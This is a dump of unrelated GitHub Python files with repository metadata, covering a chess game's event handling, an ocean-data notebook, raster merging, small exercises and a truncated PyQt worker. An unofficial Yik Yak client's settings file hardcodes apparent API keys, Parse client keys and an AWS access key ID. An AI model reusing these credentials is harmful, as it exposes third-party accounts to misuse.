game.show_user_guide = False\r\n # マスを選択する\r\n _select_square_key_event(key, shift)\r\n\r\n\r\ndef _promotion_mouse_event(mpos: MousePos):\r\n '''プロモーション先の選択'''\r\n if not game.prom:\r\n return\r\n\r\n assert game.kind is not None\r\n assert game.endpos is not None\r\n _num = len(game.kind['promote2'])\r\n _piece_size = int(du.square_size(game.kind['size']))\r\n _area_size = _piece_size + 30\r\n _rect_width = _area_size * (_num % 4 if _num < 4 else 4)\r\n _rect_height = _area_size * (1 + (_num - 1) // 4)\r\n _rect_left = 480 - _rect_width // 2\r\n _rect_top = 480 - _rect_height // 2\r\n for i in range(_num):\r\n if du.on_button(mpos, (\r\n _rect_left + _area_size * (i % 4),\r\n _rect_top + _area_size * (i // 4),\r\n ), (_area_size, _area_size)):\r\n eu.promotion_event(i)\r\n return\r\n\r\n\r\ndef _promotion_key_event(key: int):\r\n '''プロモーション先の選択'''\r\n assert game.kind is not None\r\n assert game.endpos is not None\r\n _index = game.selecting_prom_piece_index\r\n if game.selecting_prom_piece_index is None:\r\n game.selecting_prom_piece_index = 0\r\n return\r\n assert _index is not None\r\n _promote_len = len(game.kind['promote2'])\r\n if key == pygame.K_LEFT:\r\n game.selecting_prom_piece_index -= 0 if _index % 4 == 0 else 1\r\n elif key == pygame.K_UP:\r\n game.selecting_prom_piece_index -= 4 if _index // 4 > 0 else 0\r\n elif key == pygame.K_RIGHT:\r\n game.selecting_prom_piece_index += 0 if _index % 4 == 3 else 1\r\n elif key == pygame.K_DOWN:\r\n game.selecting_prom_piece_index += 4 if _index // 4 <= _promote_len // 4 else 0\r\n elif key == pygame.K_RETURN:\r\n eu.promotion_event(_index)\r\n return\r\n if game.selecting_prom_piece_index > _promote_len - 1:\r\n game.selecting_prom_piece_index = _promote_len - 1\r\n\r\n\r\ndef _castling_confirmation_mouse_event(mpos: MousePos):\r\n '''キャスリングするかどうかの確認'''\r\n if not game.confirm_castling:\r\n return\r\n\r\n # する\r\n _on_yes_button = du.on_button(mpos, (360, 480), (90, 60))\r\n _on_no_button = False\r\n if _on_yes_button:\r\n game.do_castling = True\r\n else:\r\n # しない\r\n _on_no_button = du.on_button(mpos, (510, 480), (90, 60))\r\n if _on_no_button:\r\n game.do_castling = False\r\n\r\n if _on_yes_button or _on_no_button:\r\n eu.castling_event()\r\n\r\n\r\ndef _castling_confirmation_key_event(key: int):\r\n '''キャスリングするかどうかの確認'''\r\n # [y] する\r\n if key == pygame.K_y:\r\n game.do_castling = True\r\n # [n] しない\r\n elif key == pygame.K_n:\r\n game.do_castling = False\r\n if key in (pygame.K_y, pygame.K_n):\r\n eu.castling_event()\r\n\r\n\r\ndef _board_back_forward_key_event(key: int):\r\n '''盤面を戻したり進めたりするキーボードイベント'''\r\n if game.prom or game.confirm_castling or game.moving or game.arrow_targets != set():\r\n return\r\n\r\n # [z] 一手戻す\r\n if key == pygame.K_z:\r\n game.prev_move()\r\n if game.mode == 'PvsC':\r\n game.prev_move()\r\n # [x] 一手進める\r\n elif key == pygame.K_x:\r\n game.next_move()\r\n\r\n\r\ndef _game_key_event(key: int, mod: int):\r\n '''ゲーム中のキーボードイベント'''\r\n # [y] / [n] ゲーム選択メニューに戻るかの確認の決定\r\n if game.alert:\r\n _back_to_home_key_event(key)\r\n # [y] / [n] キャスリングするかの確認の決定\r\n elif game.confirm_castling:\r\n _castling_confirmation_key_event(key)\r\n # [←][⇡][→][↓][enter] プロモーション先の選択・決定\r\n elif game.prom:\r\n _promotion_key_event(key)\r\n else:\r\n # 駒の移動・矢の射撃\r\n _pieces_action_key_event(key, mod & pygame.KMOD_SHIFT)\r\n # [space] 駒の説明を表示\r\n if key == pygame.K_SPACE and game.startpos is not None:\r\n game.piece_for_description = game.gameboard[game.startpos].__class__.__name__\r\n game.time = 0\r\n game.show_value = False\r\n game.show_user_guide = False\r\n return\r\n # [backspace] ゲーム選択メニューに戻るかの確認\r\n if key == pygame.K_BACKSPACE:\r\n game.alert = True\r\n game.show_value = False\r\n game.show_user_guide = False\r\n return\r\n # [v] 駒の価値を表示する\r\n if key == pygame.K_v:\r\n game.show_value = not game.show_value\r\n game.show_user_guide = False\r\n return\r\n # [shift+/]/[?] ヘルプを表示する\r\n if key == pygame.K_SLASH and mod & pygame.KMOD_SHIFT:\r\n game.show_user_guide = not game.show_user_guide\r\n game.show_value = False\r\n return\r\n # [ctrl+s] ゲームデータのセーブ\r\n if key == pygame.K_s and mod & pygame.KMOD_CTRL:\r\n print('Save the data:\\nSet pick: true in one of the data saved in data.yml.')\r\n print('Then visit the same game again and type ctrl+L, or just run command with color option.\\n')\r\n utils.save_print(game)\r\n return\r\n # [ctrl+l] ゲームデータのロード\r\n if key == pygame.K_l and mod & pygame.KMOD_CTRL:\r\n game.load_data()\r\n return\r\n # [z] / [x] 一手戻す / 進める\r\n _board_back_forward_key_event(key)\r\n\r\n\r\ndef _left_mouse_event(pos: MousePos):\r\n '''左クリックイベント'''\r\n # ゲームの種類の選択\r\n if game.select_game:\r\n _select_game_mouse_event(pos)\r\n return\r\n # 色・モードなどの設定\r\n elif game.select_color:\r\n _settings_mouse_event(pos)\r\n return\r\n\r\n # ゲーム\r\n if game.alert:\r\n _back_to_home_mouse_event(pos)\r\n elif not game.show_value and not game.show_user_guide:\r\n _pieces_action_mouse_event(pos)\r\n _promotion_mouse_event(pos)\r\n _castling_confirmation_mouse_event(pos)\r\n game.selecting_square = game.cmd_repeat_num = game.dest_cmd = None\r\n\r\n\r\ndef _right_mouse_event(pos: MousePos):\r\n '''右クリックイベント'''\r\n assert game.kind is not None\r\n _pointing_coord = du.parse_mouse(pos, game.kind['size'], game.my_color == 'B')\r\n if (_pointing_coord in game.gameboard\r\n and not game.alert\r\n and not game.show_value\r\n and not game.show_user_guide):\r\n # 駒の説明を表示\r\n assert _pointing_coord is not None\r\n game.piece_for_description = game.gameboard[_pointing_coord].__class__.__name__\r\n game.time = 0\r\n else:\r\n # 駒選択解除\r\n game.startpos, game.endpos = None, None\r\n\r\n\r\ndef _mouse_event(pos: MousePos, button: int):\r\n '''マウス'''\r\n # 左\r\n if button == 1:\r\n _left_mouse_event(pos)\r\n # 右\r\n elif (button == 3\r\n and not (game.select_game or game.select_color)\r\n and not game.prom\r\n and not game.confirm_castling):\r\n _right_mouse_event(pos)\r\n\r\n\r\ndef _key_event(key: int, mod: int):\r\n # 閉じる\r\n if key == pygame.K_ESCAPE:\r\n pygame.quit()\r\n sys.exit()\r\n # ゲームの種類の選択\r\n if game.select_game:\r\n _select_game_key_event(key)\r\n # 色・モードなどの設定\r\n elif game.select_color:\r\n _settings_key_event(key)\r\n # ゲーム中\r\n else:\r\n # 駒説明を非表示にする\r\n game.piece_for_description = None\r\n _game_key_event(key, mod)\r\n\r\n\r\ndef event():\r\n '''イベントハンドリング'''\r\n for event in pygame.event.get():\r\n # 閉じるボタン\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n # マウスクリック\r\n if (event.type == pygame.MOUSEBUTTONDOWN\r\n and not game.moving and game.shooting_target is None):\r\n _mouse_event(event.pos, event.button)\r\n # 右クリックを離したとき、駒説明を非表示にする\r\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 3:\r\n game.piece_for_description = None\r\n # キーボード\r\n elif (event.type == pygame.KEYDOWN\r\n and not game.moving and game.shooting_target is None):\r\n _key_event(event.key, event.mod)\r\n # スペースキーを離したとき、駒説明を非表示にする\r\n elif event.type == pygame.KEYUP and event.key == pygame.K_SPACE:\r\n game.piece_for_description = None\r\n","repo_name":"midorimici/fairy-chess","sub_path":"codes/main/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":18958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38213175187","text":"fruit = input()\r\nday = input()\r\nquantity = float(input())\r\nprice = 0\r\nif day == \"Sunday\" or day == \"Saturday\":\r\n if fruit == \"banana\":\r\n price = 2.70\r\n elif fruit == \"apple\":\r\n price = 1.25\r\n elif fruit == \"orange\":\r\n price = 0.90\r\n elif fruit == \"grapefruit\":\r\n price = 1.60\r\n elif fruit == \"kiwi\":\r\n price = 3.00\r\n elif fruit == \"pineapple\":\r\n price = 5.60\r\n elif fruit == \"grapes\":\r\n price = 4.20\r\n if price != 0:\r\n price = price * quantity\r\n print(f\"{price:.2f}\")\r\n else:\r\n print(\"error\")\r\nelif day == \"Monday\" or day == \"Tuesday\" or day == \"Wednesday\" or day == \"Thursday\" or day == \"Friday\":\r\n if fruit == \"banana\":\r\n price = 2.50\r\n elif fruit == \"apple\":\r\n price = 1.20\r\n elif fruit == \"orange\":\r\n price = 0.85\r\n elif fruit == \"grapefruit\":\r\n price = 1.45\r\n elif fruit == \"kiwi\":\r\n price = 2.70\r\n elif fruit == \"pineapple\":\r\n price = 5.50\r\n elif fruit == \"grapes\":\r\n price = 3.85\r\n if price != 0:\r\n price = price * quantity\r\n print(f\"{price:.2f}\")\r\n else:\r\n print(\"error\")\r\nelse:\r\n print(\"error\")","repo_name":"soxa2022/SoftUni_Python_Courses","sub_path":"Programming_basic_Python/conditional_statements_advanced_lab/fruit_shop.py","file_name":"fruit_shop.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"41305561614","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Settings for Yik Yak and Parse APIs\"\"\"\n\n# Yik Yak API Parameters\nYIKYAK_APIKEY = \"EF64523D2BD1FA21F18F5BC654DFC41B\"\nYIKYAK_ENDPOINT = \"https://us-central-api.yikyakapi.net/api/\"\nYIKYAK_VERSION = \"2.7.3\"\nYIKYAK_VERSION_LETTER = \"e\"\n\n\n# Parse API Parameters\nPARSE_APPID = \"wMkdjBI4ircsNcRn8mXnBkgH0dwOcrkexrdMY3vY\"\nPARSE_CLIENTKEY = \"GbNFwvFgoUu1wYuwIexNImy8bnSlNhqssG7gd53Y\"\nPARSE_ENDPOINT = \"https://api.parse.com/2/\"\nPARSE_VERSION = \"1.7.1\"\nPARSE_VERSION_LETTER = \"a\"\nPARSE_BUILD = \"59\"\nPARSE_API_LEVEL = \"22\"\n\n\n# Notify API Parameters\nNOTIFY_ENDPOINT = \"https://notify.yikyakapi.net/api/\"\n\n\n# Basecamp API Parameters\nBASECAMP_ENDPOINT = \"https://bc.yikyakapi.net/api/\"\n\n\n# Amazon S3 API Parameters (AWS_SECRET_KEY unknown)\nAWS_ACCESS_KEY = \"AKIAJFD2ANADKEMPW52A\"\nAWS_BUCKET = \"photos-upload-yy\"\nAWS_SECRET_KEY = None\nAWS_UPLOAD_ENDPOINT = \"http://signedup.yikyakapi.net/upload\"\n\n\n# Yik Yak Settings Parameters\nALLOWED_SITES_URL = \"http://lv.yikyakapi.net/getSites\"\nCONFIG_URL = \"https://d3436qb9f9xu23.cloudfront.net/yikyak-config-android.json\"\n\n\n# Device Settings (for User Agent)\nVM_TYPE = \"Dalvik\"\nVM_VERSION = \"1.6.0\"\nANDROID_VERSION = \"4.0.5\"\nDEVICE = \"google_sdk\"\nBUILD = \"MR1\"\n\n\n# Options for randomize_user_agent()\nVM_VERSIONS = [\"1.7.0\", \"1.8.0\", \"1.8.1\"]\nANDROID_VERSIONS = [\"4.0.4\", \"4.5\", \"4.3\", \"5.1\"]\nBUILD_STRING_LENGTHS = [3, 4, 5]\nDEVICES = [\"Nexus 4\", \"Nexus 5\", \"HTC One_M8\", \"SM-N900V\", \"XT1080\",\n \"SM-G900V\", \"SCH-I545\", \"Android SDK built for x86\"]\n\n\n# Randomization options\nRANDOMIZE_USER_AGENT = True\nRANDOMIZE_ENDPOINT = False\nLOCATIONIZE_ENDPOINT = False\n\n\n# Logging options\nLOG_USERIDS = True\n\n\n# Other Yik Yak-related parameters\nNO_YAKS_MESSAGE_ID = \"Y/b3c6c56b0305f2bc794e40b504f7150f\"\nTOO_CLOSE_TO_SCHOOL_MESSAGE_ID = \"Y/1687dcbe8ca5a308d46c44343a4c69eb\"\nCONTACT_US_REASONS = [\"My Basecamp location is wrong.\",\n \"I'm not near a high school but it says I am! Help!\",\n \"I want my college to be a Peek location!\",\n \"I have a really cool idea for the app.\",\n \"Yik Yak isn't working properly on my phone.\",\n \"Someone posted something and I want it taken down.\",\n \"My Yakarma has been reset.\", \"I forgot my pin code.\",\n \"Other\"]\n","repo_name":"akashlevy/Yaklient","sub_path":"yaklient/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"5240411344","text":"import numpy as np\n\n\ndataPath = './'\n\npapers = np.loadtxt(dataPath + 'papers.tsv', delimiter='\\t', comments=None, dtype=str)\nvolumes = np.loadtxt(dataPath + 'volumes.tsv', delimiter='\\t', comments=None, dtype=str)\n\nvenues = {}\nfor volume in volumes:\n volumeId=volume[0]\n fileId=volumeId[0:volumeId.rfind('.')]\n if fileId not in venues:\n venues[fileId]=([],[],volume[1])\n year=volume[2]\n location=volume[3]\n if ('online' in location.lower()) or ('virtual' in location.lower()) :\n location='@'\n venues[fileId][0].append(year)\n venues[fileId][1].append(location)\n\nout=open(dataPath+'venues.tsv','w')\nfor venue in venues:\n out.write(venue)\n years, pos = np.unique(venues[venue][0], return_inverse=True)\n bestPos = np.bincount(pos).argmax()\n out.write('\\t' + years[bestPos])\n locations, pos = np.unique(venues[venue][1], return_inverse=True)\n bestPos = np.bincount(pos).argmax()\n out.write('\\t' + locations[bestPos])\n out.write('\\t' + venues[venue][2])\n out.write('\\n')\nout.close()\n","repo_name":"piotrmp/nlp_geography","sub_path":"nlpgeo_code/refine1.py","file_name":"refine1.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38306612427","text":"######################################################################\n# each raster in a directory is merged into one raster that \n# displays the waterway occupancy\n######################################################################\n\nimport os\nimport functools\nimport numpy as np\nfrom osgeo import gdal, osr, ogr\n\ndef add_rasters(base_path=r\"D:\\Users\\krob\\Documents\\AIS\\Scripts\\output_rws\\track_tiff\\individual_rasters\"):\n for counter, directory in enumerate(os.listdir(base_path)):\n \n # settings for output raster layer\n output = r\"D:\\Users\\krob\\Documents\\AIS\\Scripts\\output_rws\\track_tiff\\total_rasters\\{}_wgs84.tif\".format(directory)\n pixel_size = 0.025\n\n extent_shp = ogr.Open(r\"D:\\Users\\krob\\Documents\\AIS\\extent.shp\")\n extent_layer = extent_shp.GetLayer()\n x_min, x_max, y_min, y_max = extent_layer.GetExtent()\n\n x_res = int((x_max - x_min) / pixel_size)\n y_res = int((y_max - y_min) / pixel_size)\n\n raster_total_array = []\n\n # set spatial reference system\n srs = osr.SpatialReference()\n # srs.ImportFromEPSG(28992)\n srs.ImportFromEPSG(4326)\n dest_wkt = srs.ExportToWkt()\n\n for counter, filen in enumerate(os.listdir(r'{}\\{}'.format(base_path, directory))):\n # open raster file\n workfile = r'{}\\{}\\{}'.format(base_path, directory, filen)\n raster = gdal.Open(workfile, gdal.GA_Update)\n\n # set spatial reference\n raster.SetProjection(dest_wkt)\n\n # send raster as np array to raster_total_array\n raster_array = raster.ReadAsArray()\n raster_total_array.append(raster_array)\n\n # raster = None\n\n concat_raster = functools.reduce(lambda a, b: np.add(a, b), raster_total_array)\n\n target_ds = gdal.GetDriverByName('GTiff').Create(output, x_res, y_res, 1, gdal.GDT_Byte)\n target_ds.SetGeoTransform((x_min, pixel_size, 0, y_max, 0, -pixel_size))\n target_ds.SetProjection(dest_wkt)\n\n target_ds.GetRasterBand(1).WriteArray(concat_raster)\n\n target_ds.FlushCache()\n","repo_name":"bkronemeijer/internship","sub_path":"add_rasters.py","file_name":"add_rasters.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"29531453137","text":"title = \"Fetching data from a CSW catalog\"\nname = '2015-10-12-fetching_data'\n\nget_ipython().magic('matplotlib inline')\nimport seaborn\nseaborn.set(style='ticks')\n\nimport os\nfrom datetime import datetime\nfrom IPython.core.display import HTML\n\nimport warnings\nwarnings.simplefilter(\"ignore\")\n\n# Metadata and markdown generation.\nhour = datetime.utcnow().strftime('%H:%M')\ncomments = \"true\"\n\ndate = '-'.join(name.split('-')[:3])\nslug = '-'.join(name.split('-')[3:])\n\nmetadata = dict(title=title,\n date=date,\n hour=hour,\n comments=comments,\n slug=slug,\n name=name)\n\nmarkdown = \"\"\"Title: {title}\ndate: {date} {hour}\ncomments: {comments}\nslug: {slug}\n\n{{% notebook {name}.ipynb cells[2:] %}}\n\"\"\".format(**metadata)\n\ncontent = os.path.abspath(os.path.join(os.getcwd(), os.pardir,\n os.pardir, '{}.md'.format(name)))\n\nwith open('{}'.format(content), 'w') as f:\n f.writelines(markdown)\n\n\nhtml = \"\"\"\n\n

This post was written as an IPython notebook. It is available for\ndownload. You can also try an interactive version on\nbinder.

\n

\n\"\"\" % (name)\n\nfrom datetime import datetime, timedelta\n\nevent_date = datetime(2015, 8, 15)\n\nstart = event_date - timedelta(days=4)\nstop = event_date + timedelta(days=4)\n\nspacing = 0.25\n\nbbox = [-71.05-spacing, 42.28-spacing,\n -70.82+spacing, 42.38+spacing]\n\nimport iris\nfrom utilities import CF_names\n\nsos_name = 'sea_water_temperature'\nname_list = CF_names[sos_name]\n\nunits = iris.unit.Unit('celsius')\n\nfrom owslib import fes\nfrom utilities import fes_date_filter\n\nkw = dict(wildCard='*',\n escapeChar='\\\\',\n singleChar='?',\n propertyname='apiso:AnyText')\n\nor_filt = fes.Or([fes.PropertyIsLike(literal=('*%s*' % val), **kw)\n for val in name_list])\n\n# Exclude ROMS Averages and History files.\nnot_filt = fes.Not([fes.PropertyIsLike(literal='*Averages*', **kw)])\n\nbegin, end = fes_date_filter(start, stop)\nfilter_list = [fes.And([fes.BBox(bbox), begin, end, or_filt, not_filt])]\n\nfrom owslib.csw import CatalogueServiceWeb\n\ncsw = CatalogueServiceWeb('http://www.ngdc.noaa.gov/geoportal/csw',\n timeout=60)\n\ncsw.getrecords2(constraints=filter_list, maxrecords=1000, esn='full')\n\nfmt = '{:*^64}'.format\nprint(fmt(' Catalog information '))\nprint(\"CSW version: {}\".format(csw.version))\nprint(\"Number of datasets available: {}\".format(len(csw.records.keys())))\n\nfrom utilities import service_urls\n\ndap_urls = service_urls(csw.records, service='odp:url')\nsos_urls = service_urls(csw.records, service='sos:url')\n\nprint(fmt(' SOS '))\nfor url in sos_urls:\n print('{}'.format(url))\n\nprint(fmt(' DAP '))\nfor url in dap_urls:\n print('{}.html'.format(url))\n\nfrom utilities import is_station\n\nnon_stations = []\nfor url in dap_urls:\n try:\n if not is_station(url):\n non_stations.append(url)\n except RuntimeError as e:\n print(\"Could not access URL {}. {!r}\".format(url, e))\n\ndap_urls = non_stations\n\nprint(fmt(' Filtered DAP '))\nfor url in dap_urls:\n print('{}.html'.format(url))\n\nfrom pyoos.collectors.ndbc.ndbc_sos import NdbcSos\n\ncollector_ndbc = NdbcSos()\n\ncollector_ndbc.set_bbox(bbox)\ncollector_ndbc.end_time = stop\ncollector_ndbc.start_time = start\ncollector_ndbc.variables = [sos_name]\n\nofrs = collector_ndbc.server.offerings\ntitle = collector_ndbc.server.identification.title\nprint(fmt(' NDBC Collector offerings '))\nprint('{}: {} offerings'.format(title, len(ofrs)))\n\nfrom utilities import collector2table, get_ndbc_longname\n\nndbc = collector2table(collector=collector_ndbc)\n\nnames = []\nfor s in ndbc['station']:\n try:\n name = get_ndbc_longname(s)\n except ValueError:\n name = s\n names.append(name)\n\nndbc['name'] = names\n\nndbc.set_index('name', inplace=True)\nndbc.head()\n\nfrom pyoos.collectors.coops.coops_sos import CoopsSos\n\ncollector_coops = CoopsSos()\n\ncollector_coops.set_bbox(bbox)\ncollector_coops.end_time = stop\ncollector_coops.start_time = start\ncollector_coops.variables = [sos_name]\n\nofrs = collector_coops.server.offerings\ntitle = collector_coops.server.identification.title\nprint(fmt(' Collector offerings '))\nprint('{}: {} offerings'.format(title, len(ofrs)))\n\nfrom utilities import get_coops_metadata\n\ncoops = collector2table(collector=collector_coops)\n\nnames = []\nfor s in coops['station']:\n try:\n name = get_coops_metadata(s)[0]\n except ValueError:\n name = s\n names.append(name)\n\ncoops['name'] = names\n\ncoops.set_index('name', inplace=True)\ncoops.head()\n\nfrom pandas import concat\n\nall_obs = concat([coops, ndbc])\n\nall_obs.head()\n\nfrom pandas import DataFrame\nfrom owslib.ows import ExceptionReport\nfrom utilities import pyoos2df, save_timeseries\n\niris.FUTURE.netcdf_promote = True\n\ndata = dict()\ncol = 'sea_water_temperature (C)'\nfor station in all_obs.index:\n try:\n idx = all_obs['station'][station]\n df = pyoos2df(collector_ndbc, idx, df_name=station)\n if df.empty:\n df = pyoos2df(collector_coops, idx, df_name=station)\n data.update({idx: df[col]})\n except ExceptionReport as e:\n print(\"[{}] {}:\\n{}\".format(idx, station, e))\n\nfrom pandas import date_range\n\nindex = date_range(start=start, end=stop, freq='1H')\nfor k, v in data.iteritems():\n data[k] = v.reindex(index=index, limit=1, method='nearest')\n\nobs_data = DataFrame.from_dict(data)\n\nobs_data.head()\n\nimport warnings\nfrom iris.exceptions import (CoordinateNotFoundError, ConstraintMismatchError,\n MergeError)\nfrom utilities import (quick_load_cubes, proc_cube, is_model,\n get_model_name, get_surface)\n\ncubes = dict()\nfor k, url in enumerate(dap_urls):\n print('\\n[Reading url {}/{}]: {}'.format(k+1, len(dap_urls), url))\n try:\n cube = quick_load_cubes(url, name_list,\n callback=None, strict=True)\n if is_model(cube):\n cube = proc_cube(cube, bbox=bbox,\n time=(start, stop), units=units)\n else:\n print(\"[Not model data]: {}\".format(url))\n continue\n cube = get_surface(cube)\n mod_name, model_full_name = get_model_name(cube, url)\n cubes.update({mod_name: cube})\n except (RuntimeError, ValueError,\n ConstraintMismatchError, CoordinateNotFoundError,\n IndexError) as e:\n print('Cannot get cube for: {}\\n{}'.format(url, e))\n\nfrom iris.pandas import as_series\nfrom utilities import (make_tree, get_nearest_water,\n add_station, ensure_timeseries, remove_ssh)\n\nmodel_data = dict()\nfor mod_name, cube in cubes.items():\n print(fmt(mod_name))\n try:\n tree, lon, lat = make_tree(cube)\n except CoordinateNotFoundError as e:\n print('Cannot make KDTree for: {}'.format(mod_name))\n continue\n # Get model series at observed locations.\n raw_series = dict()\n for station, obs in all_obs.iterrows():\n try:\n kw = dict(k=10, max_dist=0.08, min_var=0.01)\n args = cube, tree, obs.lon, obs.lat\n series, dist, idx = get_nearest_water(*args, **kw)\n except ValueError as e:\n status = \"No Data\"\n print('[{}] {}'.format(status, obs.name))\n continue\n if not series:\n status = \"Land \"\n else:\n series = as_series(series)\n raw_series.update({obs['station']: series})\n status = \"Water \"\n print('[{}] {}'.format(status, obs.name))\n if raw_series: # Save that model series.\n model_data.update({mod_name: raw_series})\n del cube\n\nimport matplotlib.pyplot as plt\n\nbuoy = '44013'\n\nfig , ax = plt.subplots(figsize=(11, 2.75))\n\nobs_data[buoy].plot(ax=ax, label='Buoy')\n\nfor model in model_data.keys():\n try:\n model_data[model][buoy].plot(ax=ax, label=model)\n except KeyError:\n pass # Could not find a model at this location.\n\nleg = ax.legend()\n\nbuoy = '44029'\n\nfig , ax = plt.subplots(figsize=(11, 2.75))\n\nobs_data[buoy].plot(ax=ax, label='Buoy')\n\nfor model in model_data.keys():\n try:\n model_data[model][buoy].plot(ax=ax, label=model)\n except KeyError:\n pass # Could not find a model at this location.\n\nleg = ax.legend()\n\nbuoy = '8443970'\n\nfig , ax = plt.subplots(figsize=(11, 2.75))\n\nobs_data[buoy].plot(ax=ax, label='Buoy')\n\nfor model in model_data.keys():\n try:\n model_data[model][buoy].plot(ax=ax, label=model)\n except KeyError:\n pass # Could not find a model at this location.\n\nleg = ax.legend()\n\nHTML(html)\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/2015-10-12-fetching_data.py","file_name":"2015-10-12-fetching_data.py","file_ext":"py","file_size_in_byte":8757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34188838343","text":"import random\nimport os\nfrom art import logo\nfrom random import choices, choice\n\nCARTAS = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10]\n\nif input('Você gostaria de jogar 21? Escolha \"s\" ou \"n\": ').lower() == 's':\n os.system('cls')\n print(logo)\n\n # 1ª rodada\n cartas_jogador = choices(CARTAS, k=2)\n cartas_computador = choices(CARTAS, k=1)\n\n imprimir_cartas_jogador = f'Suas cartas: {cartas_jogador}'\n imprimir_cartas_computador = f'Cartas do computador: {cartas_computador}'\n\n print(imprimir_cartas_jogador)\n print(imprimir_cartas_computador)\n\n # Primeira rodada\n if input('Gostaria de mais uma carta? \"s\" ou \"n\": ').lower() == 's':\n cartas_jogador.insert(choice(CARTAS))\n cartas_computador.append(choice(CARTAS))\n\n print(imprimir_cartas_jogador)\n print(imprimir_cartas_computador)\n\nelse:\n print(f'Muito Obrigado!')\n","repo_name":"pedrolisboaa/bootcamp_python_100_days","sub_path":"Beginner/Day 11 - Black Jack/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73465501229","text":"from flask import redirect, url_for, render_template, request\r\nfrom rates_app import app\r\nimport funcs\r\n\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n funcs.update_bd()\r\n return redirect(url_for(\"get_rates\"))\r\n\r\n\r\n@app.route(\"/rates/\")\r\ndef get_rates():\r\n if request.args: # Requested rate\r\n get_records = funcs.filter_r(request.args) # Requested, barely readable records.\r\n else:\r\n get_records = funcs.get_all_last_updated_cc() # All available, barely readable records.\r\n customize_it = funcs.create_tup(get_records) # Readable and compact form to proceed for the next step.\r\n return render_template(\"main.html\", rates=customize_it)\r\n","repo_name":"olmits/xrate","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"2046447922","text":"from catbird.models.modules.recurrent_modules import RecurrentLayer\nimport torch\n\n\ndef test_recurrent_layer():\n batch_size = 16\n hidden_size = 128\n num_layers = 3\n seq_length = 10\n\n x = torch.rand(seq_length, batch_size, hidden_size)\n\n rnn = RecurrentLayer(\n \"LSTM\",\n hidden_size,\n hidden_size,\n num_layers=3,\n bias=True,\n batch_first=False,\n residual=True,\n dropout=0.0,\n bidirectional=False,\n )\n state_size = num_layers, batch_size, hidden_size\n\n h0 = x.new_zeros(*state_size)\n c0 = x.new_zeros(*state_size)\n x, (final_hiddens, final_cells) = rnn(\n x, (h0, c0)\n ) # [seq_len, btz, hid], ([nlayers, btz, hid], [nlayers, btz, hid])\n\n print(x.shape)\n print(final_hiddens.shape)\n print(final_cells.shape)\n\n assert False\n","repo_name":"afonso-sousa/catbird","sub_path":"tests/test_models/test_modules.py/test_recurrent.py","file_name":"test_recurrent.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"39084904650","text":"from typing import List\n\nfrom PyQt5 import QtCore\n\nfrom thread import job, enums\n\n\nclass Worker(QtCore.QObject):\n progressUpdate = QtCore.pyqtSignal(job.Job, float)\n jobComplete = QtCore.pyqtSignal(job.Job)\n\n activeChange = QtCore.pyqtSignal(bool)\n stopSuccess = QtCore.pyqtSignal()\n debugMessage = QtCore.pyqtSignal(str)\n\n # region Setup\n def __init__(self):\n super().__init__()\n # 0 is the front of the queue, the current job is the only at the front of the queue\n # a job must always be on the queue before calling do_job\n\n # Kanban job queues\n self._to_do_queue: List[job.Job] = []\n self._doing_queue: List[job.Job] = []\n self._job_number: int = 0\n self._job_loop_active: bool = False\n self._worker_active: bool = False\n self._stopping: bool = False\n # endregion\n\n # region Slots for Manager\n def request_job(self,\n job_: job.Job,\n queue_as: enums.QueueAs\n ):\n self._job_number += 1\n job_.job_number = self._job_number\n job_.set_job_checkpoint(self._job_checkpoint)\n self._stopping = False\n\n if queue_as == enums.QueueAs.ENQUEUE:\n # join the back of the queue and waits it's turn\n self._to_do_queue.append(job_)\n elif queue_as == enums.QueueAs.SINGULAR:\n # Command to just run this job and get rid of all the others as quickly as possible\n # request all other jobs to stop\n # add this job to be next in the queue\n self._request_all_existing_jobs_stop()\n self._to_do_queue.append(job_)\n elif queue_as == enums.QueueAs.EXPEDITE:\n # should always have the job loop active if running a job\n if self._job_loop_active:\n # don't need to worry about ensuring an active job loop\n # do this job leaving the previous current job partially completed\n self._do_job(job_)\n # so can then continue with previous job that was in progress or the next in the queue\n\n # Clean up:\n # If job queue already active it will do nothing. Cleanup will happen when another one stops.\n # If it is inactive but there is nothing to_do then it is the last job in progress then will clean up.\n\n # if not self._job_loop_active and not self._to_do_queue:\n # self._final_cleanup()\n else:\n # use the job loop to run the job\n self._to_do_queue.append(job_)\n\n # Always call the job loop and let it sort out running of other jobs and ultimate cleanup.\n self._job_loop()\n\n # if not self._job_loop_active and len(self._todo_queue) > 0:\n # self._job_loop()\n\n # def _print_status(self, calling_point: str):\n # print(calling_point)\n # print(f\"to_do : {len(self._to_do_queue)}\")\n # print(f\"doing : {len(self._doing_queue)}\")\n # print(f\"loop active : {self._job_loop_active}\")\n # print(f\"stopping : {self._stopping}\")\n\n def request_stop(self):\n # cancel all jobs in the to_do queue\n # self._print_status(\"request_stop start\")\n self._stopping = True\n self._request_all_existing_jobs_stop()\n if not self._doing_queue:\n 